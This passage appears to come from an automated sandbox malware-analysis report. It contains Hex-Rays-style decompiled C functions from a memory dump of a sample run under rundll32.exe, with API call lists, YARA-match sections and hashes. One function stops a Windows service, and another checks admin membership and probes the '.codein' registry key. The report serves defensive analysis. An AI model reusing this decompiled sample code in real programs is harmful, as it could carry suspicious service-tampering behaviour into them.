                                                                                              					if(_t25 == 0) {
                                                                                              						HeapFree( *( *(_t45 + 0x14)), _t25, _t45);
                                                                                              					}
                                                                                              				}
                                                                                              				return _t36;
                                                                                              			}










                                                                                              0x04272153
                                                                                              0x04272156
                                                                                              0x04272158
                                                                                              0x0427215e
                                                                                              0x04272161
                                                                                              0x04272169
                                                                                              0x0427218a
                                                                                              0x0427218f
                                                                                              0x042721a4
                                                                                              0x042721a7
                                                                                              0x042721ab
                                                                                              0x042721b8
                                                                                              0x042721bc
                                                                                              0x042721d6
                                                                                              0x042721d6
                                                                                              0x042721d9
                                                                                              0x042721df
                                                                                              0x042721df
                                                                                              0x0427216b
                                                                                              0x0427216d
                                                                                              0x04272186
                                                                                              0x04272186
                                                                                              0x042721e2
                                                                                              0x042721ee
                                                                                              0x042721f7
                                                                                              0x042721fe
                                                                                              0x04272207
                                                                                              0x04272207
                                                                                              0x042721fe
                                                                                              0x04272215

                                                                                              APIs
                                                                                              • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,042737D4,00000000,?,?,04273568,?,?,?,?,00000000), ref: 0427216D
                                                                                              • RtlEnterCriticalSection.NTDLL(0000006C), ref: 042721AB
                                                                                              • SetLastError.KERNEL32(00000000,?,042737D4,00000000,?,?,04273568,?,?,?,?,00000000), ref: 042721BC
                                                                                              • RtlLeaveCriticalSection.NTDLL(0000006C), ref: 042721D9
                                                                                              • InterlockedDecrement.KERNEL32(00000028), ref: 042721E6
                                                                                              • HeapFree.KERNEL32(?,00000000,00000000,00000000,?,042737D4,00000000,?,?,04273568,?,?,?,?,00000000), ref: 04272207
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalErrorLastSection$DecrementEnterFreeHeapInterlockedLeave
                                                                                              • String ID:
                                                                                              • API String ID: 2534375417-0
                                                                                              • Opcode ID: 9d9a91a518a4760207356c2eb898a5fd7f76e71c4f1a0681f57f02f281d6f855
                                                                                              • Instruction ID: 3a2dcaaa27ea3f8bb7e4d30d29a6c267e9d995f323baeb4420e9a50e3d39da27
                                                                                              • Opcode Fuzzy Hash: 9d9a91a518a4760207356c2eb898a5fd7f76e71c4f1a0681f57f02f281d6f855
                                                                                              • Instruction Fuzzy Hash: A221AE31710105EFDB149FA8D848F59B7A9FF08301F1080A9FE0597610DB31AD11CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E042637E0(void* __ebx, short* __ecx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v32;
                                                                                              				struct _SERVICE_STATUS _v36;
                                                                                              				signed int _t6;
                                                                                              				void* _t19;
                                                                                              				short* _t25;
                                                                                              				void* _t26;
                                                                                              				signed int _t29;
                                                                                              
                                                                                              				_t6 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t6 ^ _t29;
                                                                                              				_t25 = __ecx;
                                                                                              				_t19 = OpenSCManagerW(0, 0, 0xf003f);
                                                                                              				if(_t19 != 0) {
                                                                                              					_t26 = OpenServiceW(_t19, _t25, 0x24);
                                                                                              					if(_t26 != 0) {
                                                                                              						if(QueryServiceStatus(_t26,  &_v36) != 0) {
                                                                                              							if(_v32 != 1) {
                                                                                              								ControlService(_t26, 1,  &_v36);
                                                                                              								_t28 =  !=  ? 1 : 0;
                                                                                              							}
                                                                                              						}
                                                                                              						CloseServiceHandle(_t26);
                                                                                              					}
                                                                                              					CloseServiceHandle(_t19);
                                                                                              				}
                                                                                              				return E04275AFE(_v8 ^ _t29);
                                                                                              			}











                                                                                              0x042637e6
                                                                                              0x042637ed
                                                                                              0x042637fa
                                                                                              0x04263804
                                                                                              0x04263808
                                                                                              0x04263814
                                                                                              0x04263818
                                                                                              0x04263827
                                                                                              0x0426382d
                                                                                              0x0426383d
                                                                                              0x0426384a
                                                                                              0x0426384a
                                                                                              0x0426382d
                                                                                              0x0426384e
                                                                                              0x0426384e
                                                                                              0x04263855
                                                                                              0x04263855
                                                                                              0x0426386d

                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 042637FE
                                                                                              • OpenServiceW.ADVAPI32(00000000,?,00000024), ref: 0426380E
                                                                                              • QueryServiceStatus.ADVAPI32(00000000,?,?,00000024), ref: 0426381F
                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,00000024), ref: 0426383D
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000024), ref: 0426384E
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000024), ref: 04263855
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandleOpen$ControlManagerQueryStatus
                                                                                              • String ID:
                                                                                              • API String ID: 3062456870-0
                                                                                              • Opcode ID: 692d5f2f8cb4d7a5e4dc7a47188fe156e9b2f423dcef9f472e9bd483774f6d17
                                                                                              • Instruction ID: b0a4486641921a7d3a4a9aa62b2b83255438507c41798ceb2192f565824c3c5e
                                                                                              • Opcode Fuzzy Hash: 692d5f2f8cb4d7a5e4dc7a47188fe156e9b2f423dcef9f472e9bd483774f6d17
                                                                                              • Instruction Fuzzy Hash: 2C01DB32704214BBD714AA69AC8DEBF77BCDB85751F00002DFD0AD3141DE78DC458660
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 58%
                                                                                              			E04288930(void* __ebx, void* __ecx, void* __edx) {
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t2;
                                                                                              				void* _t3;
                                                                                              				void* _t4;
                                                                                              				intOrPtr _t9;
                                                                                              				void* _t11;
                                                                                              				void* _t20;
                                                                                              				void* _t21;
                                                                                              				void* _t23;
                                                                                              				void* _t25;
                                                                                              				void* _t27;
                                                                                              				void* _t29;
                                                                                              				void* _t31;
                                                                                              				void* _t32;
                                                                                              				long _t36;
                                                                                              				long _t37;
                                                                                              				void* _t40;
                                                                                              
                                                                                              				_t29 = __edx;
                                                                                              				_t23 = __ecx;
                                                                                              				_t20 = __ebx;
                                                                                              				_t36 = GetLastError();
                                                                                              				_t2 =  *0x42a403c; // 0x8
                                                                                              				_t42 = _t2 - 0xffffffff;
                                                                                              				if(_t2 == 0xffffffff) {
                                                                                              					L2:
                                                                                              					_t3 = E04288535(_t23, 1, 0x364);
                                                                                              					_t31 = _t3;
                                                                                              					_pop(_t25);
                                                                                              					if(_t31 != 0) {
                                                                                              						_t4 = E04289171(_t25, _t36, __eflags,  *0x42a403c, _t31);
                                                                                              						__eflags = _t4;
                                                                                              						if(_t4 != 0) {
                                                                                              							E04288776(_t25, _t31, 0x42a742c);
                                                                                              							E042884AD(0);
                                                                                              							_t40 = _t40 + 0xc;
                                                                                              							__eflags = _t31;
                                                                                              							if(_t31 == 0) {
                                                                                              								goto L9;
                                                                                              							} else {
                                                                                              								goto L8;
                                                                                              							}
                                                                                              						} else {
                                                                                              							_push(_t31);
                                                                                              							goto L4;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_push(_t3);
                                                                                              						L4:
                                                                                              						E042884AD();
                                                                                              						_pop(_t25);
                                                                                              						L9:
                                                                                              						SetLastError(_t36);
                                                                                              						E04287199(_t20, _t25, _t29, _t31, _t36);
                                                                                              						asm("int3");
                                                                                              						_push(_t20);
                                                                                              						_push(_t36);
                                                                                              						_push(_t31);
                                                                                              						_t37 = GetLastError();
                                                                                              						_t21 = 0;
                                                                                              						_t9 =  *0x42a403c; // 0x8
                                                                                              						_t45 = _t9 - 0xffffffff;
                                                                                              						if(_t9 == 0xffffffff) {
                                                                                              							L12:
                                                                                              							_t32 = E04288535(_t25, 1, 0x364);
                                                                                              							_pop(_t27);
                                                                                              							if(_t32 != 0) {
                                                                                              								_t11 = E04289171(_t27, _t37, __eflags,  *0x42a403c, _t32);
                                                                                              								__eflags = _t11;
                                                                                              								if(_t11 != 0) {
                                                                                              									E04288776(_t27, _t32, 0x42a742c);
                                                                                              									E042884AD(_t21);
                                                                                              									__eflags = _t32;
                                                                                              									if(_t32 != 0) {
                                                                                              										goto L19;
                                                                                              									} else {
                                                                                              										goto L18;
                                                                                              									}
                                                                                              								} else {
                                                                                              									_push(_t32);
                                                                                              									goto L14;
                                                                                              								}
                                                                                              							} else {
                                                                                              								_push(_t21);
                                                                                              								L14:
                                                                                              								E042884AD();
                                                                                              								L18:
                                                                                              								SetLastError(_t37);
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t32 = E0428911B(_t25, _t37, _t45, _t9);
                                                                                              							if(_t32 != 0) {
                                                                                              								L19:
                                                                                              								SetLastError(_t37);
                                                                                              								_t21 = _t32;
                                                                                              							} else {
                                                                                              								goto L12;
                                                                                              							}
                                                                                              						}
                                                                                              						return _t21;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t31 = E0428911B(_t23, _t36, _t42, _t2);
                                                                                              					if(_t31 != 0) {
                                                                                              						L8:
                                                                                              						SetLastError(_t36);
                                                                                              						return _t31;
                                                                                              					} else {
                                                                                              						goto L2;
                                                                                              					}
                                                                                              				}
                                                                                              			}





















                                                                                              0x04288930
                                                                                              0x04288930
                                                                                              0x04288930
                                                                                              0x0428893a
                                                                                              0x0428893c
                                                                                              0x04288941
                                                                                              0x04288944
                                                                                              0x04288952
                                                                                              0x04288959
                                                                                              0x0428895e
                                                                                              0x04288961
                                                                                              0x04288964
                                                                                              0x04288976
                                                                                              0x0428897b
                                                                                              0x0428897d
                                                                                              0x04288988
                                                                                              0x0428898f
                                                                                              0x04288994
                                                                                              0x04288997
                                                                                              0x04288999
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428897f
                                                                                              0x0428897f
                                                                                              0x00000000
                                                                                              0x0428897f
                                                                                              0x04288966
                                                                                              0x04288966
                                                                                              0x04288967
                                                                                              0x04288967
                                                                                              0x0428896c
                                                                                              0x042889a7
                                                                                              0x042889a8
                                                                                              0x042889ae
                                                                                              0x042889b3
                                                                                              0x042889b6
                                                                                              0x042889b7
                                                                                              0x042889b8
                                                                                              0x042889bf
                                                                                              0x042889c1
                                                                                              0x042889c3
                                                                                              0x042889c8
                                                                                              0x042889cb
                                                                                              0x042889d9
                                                                                              0x042889e5
                                                                                              0x042889e8
                                                                                              0x042889eb
                                                                                              0x042889fd
                                                                                              0x04288a02
                                                                                              0x04288a04
                                                                                              0x04288a0f
                                                                                              0x04288a15
                                                                                              0x04288a1d
                                                                                              0x04288a1f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04288a06
                                                                                              0x04288a06
                                                                                              0x00000000
                                                                                              0x04288a06
                                                                                              0x042889ed
                                                                                              0x042889ed
                                                                                              0x042889ee
                                                                                              0x042889ee
                                                                                              0x04288a21
                                                                                              0x04288a22
                                                                                              0x04288a22
                                                                                              0x042889cd
                                                                                              0x042889d3
                                                                                              0x042889d7
                                                                                              0x04288a2a
                                                                                              0x04288a2b
                                                                                              0x04288a31
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042889d7
                                                                                              0x04288a38
                                                                                              0x04288a38
                                                                                              0x04288946
                                                                                              0x0428894c
                                                                                              0x04288950
                                                                                              0x0428899b
                                                                                              0x0428899c
                                                                                              0x042889a6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04288950

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00000000,0427EFC2,00000000,00000002,?,0427FC23,04280991,00000000,?,00000002), ref: 04288934
                                                                                              • _free.LIBCMT ref: 04288967
                                                                                              • _free.LIBCMT ref: 0428898F
                                                                                              • SetLastError.KERNEL32(00000000,00000000,?,00000002,?,?,?,?,?,04280991,00000000,?,0426707A,00000002), ref: 0428899C
                                                                                              • SetLastError.KERNEL32(00000000,00000000,?,00000002,?,?,?,?,?,04280991,00000000,?,0426707A,00000002), ref: 042889A8
                                                                                              • _abort.LIBCMT ref: 042889AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: e54400bb2fc368bc8007db14308b4ac7a0491419194a3f44bcb5cb4785a2e3a5
                                                                                              • Instruction ID: 9605f58eb712e630dbdca3b78b8604772d331d6ce369b9e254c32ebbcaf4b7da
                                                                                              • Opcode Fuzzy Hash: e54400bb2fc368bc8007db14308b4ac7a0491419194a3f44bcb5cb4785a2e3a5
                                                                                              • Instruction Fuzzy Hash: 69F0F43633B502BBE71136787C0CA2E2669CFC1779FA5811CF815A22C5EE75FC12516A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E04261BB0(intOrPtr* __ecx) {
                                                                                              				int _t17;
                                                                                              				intOrPtr* _t20;
                                                                                              				intOrPtr* _t22;
                                                                                              				void* _t23;
                                                                                              				struct HICON__** _t25;
                                                                                              
                                                                                              				_t20 = __ecx;
                                                                                              				_t1 = _t20 + 0x14; // 0x42a78ec
                                                                                              				 *__ecx = 0x429eca4;
                                                                                              				InterlockedExchange(_t1, 0);
                                                                                              				_t2 = _t20 + 0xc; // 0x42a78e4
                                                                                              				InterlockedExchange(_t2, 0);
                                                                                              				_t3 = _t20 + 0x24; // 0x0
                                                                                              				WaitForSingleObject( *_t3, 0xffffffff);
                                                                                              				_t4 = _t20 + 0x24; // 0x0
                                                                                              				CloseHandle( *_t4);
                                                                                              				_t5 = _t20 + 0xb0; // 0x0
                                                                                              				_t22 =  *_t5;
                                                                                              				if(_t22 != 0) {
                                                                                              					 *((intOrPtr*)( *_t22))(1);
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t20 + 0x2c)) = 0x429ec9c;
                                                                                              				_t7 = _t20 + 0x70; // 0x42a7948
                                                                                              				_t25 = _t7;
                                                                                              				_t23 = 0x10;
                                                                                              				do {
                                                                                              					DestroyCursor( *_t25);
                                                                                              					_t8 =  &(_t25[1]); // 0x0
                                                                                              					_t25 = _t8;
                                                                                              					_t23 = _t23 - 1;
                                                                                              				} while (_t23 != 0);
                                                                                              				_t9 = _t20 + 8; // 0x0
                                                                                              				 *_t20 = 0x429e8b0;
                                                                                              				_t17 = CloseHandle( *_t9);
                                                                                              				 *_t20 = 0x429e8c0;
                                                                                              				return _t17;
                                                                                              			}








                                                                                              0x04261bb8
                                                                                              0x04261bbd
                                                                                              0x04261bc0
                                                                                              0x04261bc7
                                                                                              0x04261bcb
                                                                                              0x04261bcf
                                                                                              0x04261bd3
                                                                                              0x04261bd6
                                                                                              0x04261bdc
                                                                                              0x04261bdf
                                                                                              0x04261be5
                                                                                              0x04261be5
                                                                                              0x04261bed
                                                                                              0x04261bf3
                                                                                              0x04261bf3
                                                                                              0x04261bf5
                                                                                              0x04261bfc
                                                                                              0x04261bfc
                                                                                              0x04261bff
                                                                                              0x04261c04
                                                                                              0x04261c06
                                                                                              0x04261c0c
                                                                                              0x04261c0c
                                                                                              0x04261c0f
                                                                                              0x04261c0f
                                                                                              0x04261c14
                                                                                              0x04261c17
                                                                                              0x04261c1d
                                                                                              0x04261c25
                                                                                              0x04261c2c

                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(042A78EC,00000000), ref: 04261BC7
                                                                                              • InterlockedExchange.KERNEL32(042A78E4,00000000), ref: 04261BCF
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?,04259635,?,042A78D8,00000000), ref: 04261BD6
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,04259635,?,042A78D8,00000000), ref: 04261BDF
                                                                                              • DestroyCursor.USER32(042A7948), ref: 04261C06
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,04259635,?,042A78D8,00000000), ref: 04261C1D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseExchangeHandleInterlocked$CursorDestroyObjectSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1528086460-0
                                                                                              • Opcode ID: 01c32ba5e4d1779885c85c1e8aab7fe20ecf49d7f08e462b2fcb1035a1b7a37b
                                                                                              • Instruction ID: 1b05102342468cf2b19c27327146a49689b283ab3402a71373bb6fb118c175e9
                                                                                              • Opcode Fuzzy Hash: 01c32ba5e4d1779885c85c1e8aab7fe20ecf49d7f08e462b2fcb1035a1b7a37b
                                                                                              • Instruction Fuzzy Hash: 0C015A75710210EFDF119F68E888B863FB8FF09321F114195E9059B295CB71AC11CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 88%
                                                                                              			E04280BD5(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                              				signed int _v8;
                                                                                              				void* _v12;
                                                                                              				char _v16;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr* _t36;
                                                                                              				struct HINSTANCE__* _t37;
                                                                                              				struct HINSTANCE__* _t43;
                                                                                              				intOrPtr* _t44;
                                                                                              				intOrPtr* _t45;
                                                                                              				CHAR* _t49;
                                                                                              				struct HINSTANCE__* _t50;
                                                                                              				void* _t52;
                                                                                              				struct HINSTANCE__* _t55;
                                                                                              				intOrPtr* _t59;
                                                                                              				struct HINSTANCE__* _t64;
                                                                                              				intOrPtr _t65;
                                                                                              
                                                                                              				_t52 = __ecx;
                                                                                              				if(_a4 == 2 || _a4 == 1) {
                                                                                              					E0428A309(_t52);
                                                                                              					GetModuleFileNameA(0, 0x42a72f8, 0x104);
                                                                                              					_t49 =  *0x42a7670; // 0x663328
                                                                                              					 *0x42a7678 = 0x42a72f8;
                                                                                              					if(_t49 == 0 ||  *_t49 == 0) {
                                                                                              						_t49 = 0x42a72f8;
                                                                                              					}
                                                                                              					_v8 = 0;
                                                                                              					_v16 = 0;
                                                                                              					E04280CF9(_t52, _t49, 0, 0,  &_v8,  &_v16);
                                                                                              					_t64 = E04280E6E(_v8, _v16, 1);
                                                                                              					if(_t64 != 0) {
                                                                                              						E04280CF9(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                                                                                              						if(_a4 != 1) {
                                                                                              							_v12 = 0;
                                                                                              							_push( &_v12);
                                                                                              							_t50 = E04289E24(_t49, 0, _t64, _t64);
                                                                                              							if(_t50 == 0) {
                                                                                              								_t59 = _v12;
                                                                                              								_t55 = 0;
                                                                                              								_t36 = _t59;
                                                                                              								if( *_t59 == 0) {
                                                                                              									L15:
                                                                                              									_t37 = 0;
                                                                                              									 *0x42a7664 = _t55;
                                                                                              									_v12 = 0;
                                                                                              									_t50 = 0;
                                                                                              									 *0x42a7668 = _t59;
                                                                                              									L16:
                                                                                              									E042884AD(_t37);
                                                                                              									_v12 = 0;
                                                                                              									goto L17;
                                                                                              								} else {
                                                                                              									goto L14;
                                                                                              								}
                                                                                              								do {
                                                                                              									L14:
                                                                                              									_t36 = _t36 + 4;
                                                                                              									_t55 =  &(_t55->i);
                                                                                              								} while ( *_t36 != 0);
                                                                                              								goto L15;
                                                                                              							}
                                                                                              							_t37 = _v12;
                                                                                              							goto L16;
                                                                                              						}
                                                                                              						 *0x42a7664 = _v8 - 1;
                                                                                              						_t43 = _t64;
                                                                                              						_t64 = 0;
                                                                                              						 *0x42a7668 = _t43;
                                                                                              						goto L10;
                                                                                              					} else {
                                                                                              						_t44 = E04281772();
                                                                                              						_push(0xc);
                                                                                              						_pop(0);
                                                                                              						 *_t44 = 0;
                                                                                              						L10:
                                                                                              						_t50 = 0;
                                                                                              						L17:
                                                                                              						E042884AD(_t64);
                                                                                              						return _t50;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t45 = E04281772();
                                                                                              					_t65 = 0x16;
                                                                                              					 *_t45 = _t65;
                                                                                              					E0427EEE6();
                                                                                              					return _t65;
                                                                                              				}
                                                                                              			}





















                                                                                              0x04280bd5
                                                                                              0x04280be2
                                                                                              0x04280c02
                                                                                              0x04280c15
                                                                                              0x04280c1b
                                                                                              0x04280c21
                                                                                              0x04280c29
                                                                                              0x04280c30
                                                                                              0x04280c30
                                                                                              0x04280c35
                                                                                              0x04280c3c
                                                                                              0x04280c43
                                                                                              0x04280c55
                                                                                              0x04280c5c
                                                                                              0x04280c7b
                                                                                              0x04280c87
                                                                                              0x04280ca2
                                                                                              0x04280ca5
                                                                                              0x04280cac
                                                                                              0x04280cb2
                                                                                              0x04280cb9
                                                                                              0x04280cbc
                                                                                              0x04280cbe
                                                                                              0x04280cc2
                                                                                              0x04280ccc
                                                                                              0x04280ccc
                                                                                              0x04280cce
                                                                                              0x04280cd4
                                                                                              0x04280cd7
                                                                                              0x04280cd9
                                                                                              0x04280cdf
                                                                                              0x04280ce0
                                                                                              0x04280ce6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04280cc4
                                                                                              0x04280cc4
                                                                                              0x04280cc4
                                                                                              0x04280cc7
                                                                                              0x04280cc8
                                                                                              0x00000000
                                                                                              0x04280cc4
                                                                                              0x04280cb4
                                                                                              0x00000000
                                                                                              0x04280cb4
                                                                                              0x04280c8d
                                                                                              0x04280c92
                                                                                              0x04280c94
                                                                                              0x04280c96
                                                                                              0x00000000
                                                                                              0x04280c5e
                                                                                              0x04280c5e
                                                                                              0x04280c63
                                                                                              0x04280c65
                                                                                              0x04280c66
                                                                                              0x04280c9b
                                                                                              0x04280c9b
                                                                                              0x04280ce9
                                                                                              0x04280cea
                                                                                              0x00000000
                                                                                              0x04280cf3
                                                                                              0x04280bea
                                                                                              0x04280bea
                                                                                              0x04280bf1
                                                                                              0x04280bf2
                                                                                              0x04280bf4
                                                                                              0x00000000
                                                                                              0x04280bf9

                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104), ref: 04280C15
                                                                                              • _free.LIBCMT ref: 04280CE0
                                                                                              • _free.LIBCMT ref: 04280CEA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: (3f$C:\Windows\SysWOW64\rundll32.exe
                                                                                              • API String ID: 2506810119-1572360198
                                                                                              • Opcode ID: 71cd4c61faa8c8892516e3bbf503870a546fecb77f5caa7d8e298f919939cb54
                                                                                              • Instruction ID: 018094b8038fa0cec851dc7e6fe0a40e8333895585cf99d9bc401dcb860d6062
                                                                                              • Opcode Fuzzy Hash: 71cd4c61faa8c8892516e3bbf503870a546fecb77f5caa7d8e298f919939cb54
                                                                                              • Instruction Fuzzy Hash: DD319171F23209AFEB21FF99D884D9EBBE8EF94710F15405AE80497280D670AE45CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E042562B0(void* __ebx, intOrPtr* __ecx, void* __edi) {
                                                                                              				void* _v8;
                                                                                              				void* _v12;
                                                                                              				void* __esi;
                                                                                              				void _t16;
                                                                                              				intOrPtr _t18;
                                                                                              				void* _t22;
                                                                                              				long _t27;
                                                                                              				void* _t34;
                                                                                              				char _t40;
                                                                                              				void _t41;
                                                                                              				intOrPtr* _t46;
                                                                                              				void* _t56;
                                                                                              
                                                                                              				_t44 = __edi;
                                                                                              				_t36 = __ebx;
                                                                                              				_t16 =  *0x42a65f8; // 0x38f
                                                                                              				_t46 = __ecx;
                                                                                              				_t17 =  !=  ? 0x2710 : _t16;
                                                                                              				 *((intOrPtr*)(__ecx + 0x30)) =  !=  ? 0x2710 : _t16;
                                                                                              				_t18 = E0426ABF0();
                                                                                              				 *((intOrPtr*)(_t46 + 0x2c)) = _t18;
                                                                                              				_t55 = _t18;
                                                                                              				if(_t18 != 0) {
                                                                                              					_t41 =  *0x42a65f8; // 0x38f
                                                                                              					E04266C70(__ebx, _t41, __edi, _t46, _t55);
                                                                                              					_t34 = E04266B70(__ebx, __edi, _t46, _t55);
                                                                                              					_t56 = _t34;
                                                                                              					_t35 =  ==  ?  *0x42a65f8 : _t34;
                                                                                              					 *((intOrPtr*)(_t46 + 0x30)) =  ==  ?  *0x42a65f8 : _t34;
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t46 + 0x28)) = E04275B14(_t46, _t56, 0x120);
                                                                                              				E04265A50(_t19, _t44, _t46);
                                                                                              				_t40 = E04266780(_t19, _t44, _t46);
                                                                                              				_t5 = _t46 + 4; // 0x4
                                                                                              				_t22 = _t5;
                                                                                              				 *_t46 = _t40;
                                                                                              				if(_t40 != 0) {
                                                                                              					__eflags =  *_t40 + 0x28;
                                                                                              					E0425C3E0(_t36, _t40,  *_t40 + 0x28, _t44, _t46, _t22);
                                                                                              				} else {
                                                                                              					asm("movaps xmm0, [0x429f960]");
                                                                                              					asm("movups [eax], xmm0");
                                                                                              					asm("movups [eax+0x10], xmm0");
                                                                                              					 *((char*)(_t22 + 0x20)) = 0x30;
                                                                                              					 *((char*)(_t22 + 0x20)) = _t40;
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t46 + 0x34)) = E04262F10;
                                                                                              				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Classes\\.codein", 0, 0x20119,  &_v8) != 0) {
                                                                                              					_t27 = RegOpenKeyExW(0x80000001, L"SOFTWARE\\Classes\\.codein", 0, 0x20119,  &_v12);
                                                                                              					__eflags = _t27;
                                                                                              					if(_t27 != 0) {
                                                                                              						 *(_t46 + 0x38) = 0;
                                                                                              						return _t46;
                                                                                              					} else {
                                                                                              						RegCloseKey(_v12);
                                                                                              						 *(_t46 + 0x38) = 1;
                                                                                              						return _t46;
                                                                                              					}
                                                                                              				} else {
                                                                                              					RegCloseKey(_v8);
                                                                                              					 *(_t46 + 0x38) = 1;
                                                                                              					return _t46;
                                                                                              				}
                                                                                              			}















                                                                                              0x042562b0
                                                                                              0x042562b0
                                                                                              0x042562b3
                                                                                              0x042562c3
                                                                                              0x042562ca
                                                                                              0x042562cd
                                                                                              0x042562d0
                                                                                              0x042562d5
                                                                                              0x042562d8
                                                                                              0x042562da
                                                                                              0x042562dc
                                                                                              0x042562e2
                                                                                              0x042562e7
                                                                                              0x042562ec
                                                                                              0x042562ee
                                                                                              0x042562f5
                                                                                              0x042562f5
                                                                                              0x04256305
                                                                                              0x0425630a
                                                                                              0x04256314
                                                                                              0x04256316
                                                                                              0x04256316
                                                                                              0x04256319
                                                                                              0x0425631d
                                                                                              0x04256339
                                                                                              0x0425633c
                                                                                              0x0425631f
                                                                                              0x0425631f
                                                                                              0x04256326
                                                                                              0x04256329
                                                                                              0x0425632d
                                                                                              0x04256331
                                                                                              0x04256331
                                                                                              0x04256347
                                                                                              0x04256368
                                                                                              0x04256396
                                                                                              0x0425639c
                                                                                              0x0425639e
                                                                                              0x042563b7
                                                                                              0x042563c4
                                                                                              0x042563a0
                                                                                              0x042563a3
                                                                                              0x042563a9
                                                                                              0x042563b6
                                                                                              0x042563b6
                                                                                              0x0425636a
                                                                                              0x0425636d
                                                                                              0x04256373
                                                                                              0x04256380
                                                                                              0x04256380

                                                                                              APIs
                                                                                                • Part of subcall function 0426ABF0: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0426AC2E
                                                                                                • Part of subcall function 0426ABF0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0426AC41
                                                                                                • Part of subcall function 0426ABF0: FreeSid.ADVAPI32(?), ref: 0426AC4A
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020119,0426B6FC,?,042A6318,?,?,0426B6FC), ref: 04256360
